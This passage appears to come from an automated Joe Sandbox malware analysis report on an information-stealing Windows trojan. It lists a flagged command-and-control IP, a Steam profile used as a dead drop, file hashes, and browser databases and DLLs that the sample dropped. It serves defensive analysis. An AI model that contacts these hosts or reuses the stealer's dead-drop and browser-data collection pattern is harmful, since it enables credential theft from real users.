                    • URL Reputation: safe
                    unknown
                    https://ac.ecosia.org/autocomplete?q=JEGHDA.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://95.217.240.101/vRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IP               Domain               Country         ASN     ASN Name       Malicious
                    23.194.234.100   steamcommunity.com   United States   16625   AKAMAI-ASUS    true
                    95.217.240.101   unknown              Germany         24940   HETZNER-ASDE   false
                    Joe Sandbox version: 40.0.0 Tourmaline
                    Analysis ID: 1442218
                    Start date and time: 2024-05-15 20:35:06 +02:00
                    Joe Sandbox product: CloudBasic
                    Overall analysis duration: 0h 5m 29s
                    Hypervisor based Inspection enabled: false
                    Report type: light
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of new started processes analysed: 10
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Sample name: file.exe
                    Detection: MAL
                    Classification: mal100.troj.spyw.evad.winEXE@11/25@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                    • TCP Packets have been reduced to 100
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes were analyzed; the report is missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Time       Type              Description
                    20:35:57   API Interceptor   1x Sleep call for process: RegAsm.exe modified
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):126976
                    Entropy (8bit):0.47147045728725767
                    Encrypted:false
                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                    Malicious:false
                    Reputation:high, very likely benign file
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Reputation:high, very likely benign file
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32768
                    Entropy (8bit):0.017262956703125623
                    Encrypted:false
                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                    Malicious:false
                    Reputation:high, very likely benign file
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):5242880
                    Entropy (8bit):0.037963276276857943
                    Encrypted:false
                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32768
                    Entropy (8bit):0.017262956703125623
                    Encrypted:false
                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                    Category:dropped
                    Size (bytes):159744
                    Entropy (8bit):0.7873599747470391
                    Encrypted:false
                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                    Category:dropped
                    Size (bytes):28672
                    Entropy (8bit):2.5793180405395284
                    Encrypted:false
                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                    Category:dropped
                    Size (bytes):9571
                    Entropy (8bit):5.536643647658967
                    Encrypted:false
                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                    Malicious:false
                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):685392
                    Entropy (8bit):6.872871740790978
                    Encrypted:false
                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                    MD5:550686C0EE48C386DFCB40199BD076AC
                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):608080
                    Entropy (8bit):6.833616094889818
                    Encrypted:false
                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):450024
                    Entropy (8bit):6.673992339875127
                    Encrypted:false
                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2046288
                    Entropy (8bit):6.787733948558952
                    Encrypted:false
                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):257872
                    Entropy (8bit):6.727482641240852
                    Encrypted:false
                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                    MD5:4E52D739C324DB8225BD9AB2695F262F
                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80880
                    Entropy (8bit):6.920480786566406
                    Encrypted:false
                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                    MD5:A37EE36B536409056A86F50E67777DD7
                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                    Category:dropped
                    Size (bytes):35643
                    Entropy (8bit):5.382912586977827
                    Encrypted:false
                    SSDEEP:768:s7pqLtWYmwt5D0gqVUiNGAZPzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2SC:s78LtWYmwt5D0gqVUcZPzzgiJmDzJtxW
                    MD5:7BCE059CFD60B798CB45C3F4C80B9F6C
                    SHA1:736FAB76D920E9A5E4BAB9E12E8C85C9D4B22A06
                    SHA-256:317AB49AEA660F5D325951C5EF280A54F6192D3B31A15B0F985EA292ED159980
                    SHA-512:B0875CD2B58367D1165D373600CE208B63C4E435A62C237729BB66645A43FC5A6DF16CC646553F97700FA5A7E4C3A5EEE4C7591D7A29E8F87662B815E8A56756
                    Malicious:false
                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r8p- https://95.217.240.101|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.c
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2459136
                    Entropy (8bit):6.052474106868353
                    Encrypted:false
                    SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                    MD5:90E744829865D57082A7F452EDC90DE5
                    SHA1:833B178775F39675FA4E55EAB1032353514E1052
                    SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                    SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):685392
                    Entropy (8bit):6.872871740790978
                    Encrypted:false
                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                    MD5:550686C0EE48C386DFCB40199BD076AC
                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):608080
                    Entropy (8bit):6.833616094889818
                    Encrypted:false
                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):450024
                    Entropy (8bit):6.673992339875127
                    Encrypted:false
                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
